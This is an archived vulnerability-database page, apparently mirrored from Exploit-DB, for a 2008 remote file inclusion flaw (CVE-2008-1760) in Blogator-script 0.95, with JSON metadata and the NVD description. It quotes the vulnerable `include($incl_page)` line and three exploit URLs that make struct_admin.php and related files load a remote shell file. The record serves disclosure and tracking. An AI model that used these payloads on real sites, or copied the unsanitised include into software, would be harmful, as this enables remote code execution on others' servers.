Search...

Blogator-script 0.95 incl_page Remote File Inclusion Vulnerability

2008-04-04T00:00:00

ID EDB-ID:5365
Type exploitdb
Reporter JIKO
Modified 2008-04-04T00:00:00

Description

Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability. CVE-2008-1760. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blogator-script  Version 2
# Bug   : Remote File Inclusion
# Download  : http://www.blogator-script.com/telecharger.php
# file  : struct_admin.php & struct_admin_blog.php  & struct_main.php
# Eror  :
   &lt;? include($incl_page); ?&gt;
=========================JIkI Team===================
# Exploit  :
 
  http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-04]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5365", "hash": "27e499d7c5ea0443bb3af9788a25930a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Blogator-script 0.95 incl_page Remote File Inclusion Vulnerability", "description": "Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability. CVE-2008-1760. Webapps exploit for php platform", "published": "2008-04-04T00:00:00", "modified": "2008-04-04T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5365/", "reporter": "JIKO", "references": [], "cvelist": ["CVE-2008-1760"], "lastseen": "2016-01-31T23:01:31", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5365/", "sourceData": "-------------------------------------------------------------------------\n -- JIKI Team [ JIKO + KIl1er ] ---\n-------------------------------------------------------------------------\n# Author : jiko\n# email : jalikom@hotmail.com\n# Home : www.no-back.org\n# Script : Blogator-script Version 2\n# Bug : Remote File Inclusion\n# Download : http://www.blogator-script.com/telecharger.php\n# file : struct_admin.php & struct_admin_blog.php & struct_main.php\n# Eror :\n <? include($incl_page); ?>\n=========================JIkI Team===================\n# Exploit :\n \n http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?\nhttp://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?\nhttp://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?\n=========================JIKI Team===================\n greetz : all my friend and H-T Team \n-------------------------------------------------------------------------\n -- JIKI Team [ JIKO + KIl1er ] --\n-------------------------------------------------------------------------\n\n# milw0rm.com [2008-04-04]\n", "osvdbidlist": ["44146", "44145", "44144"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-29T14:25:50", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/41660", "http://www.blogator-script.com/changelog.php", "http://www.securityfocus.com/bid/28627", "https://www.exploit-db.com/exploits/5365"], "description": "Multiple PHP remote file inclusion vulnerabilities in Blogator-script before 1.01 allow remote attackers to execute arbitrary PHP code via a URL in the incl_page parameter in (1) struct_admin.php, (2) struct_admin_blog.php, and (3) struct_main.php in _blogadata/include.", "edition": 3, "reporter": "NVD", "published": "2008-04-12T16:05:00", "title": "CVE-2008-1760", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:50", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-1760"], "scanner": [], "modified": "2017-09-28T21:30:51", "cpe": ["cpe:/a:blogator-script:blogator-script:0.95", "cpe:/a:blogator-script:blogator-script:0.92", "cpe:/a:blogator-script:blogator-script:1.00", "cpe:/a:blogator-script:blogator-script:0.91", "cpe:/a:blogator-script:blogator-script:0.90", "cpe:/a:blogator-script:blogator-script:0.93"], "id": "CVE-2008-1760", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1760", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}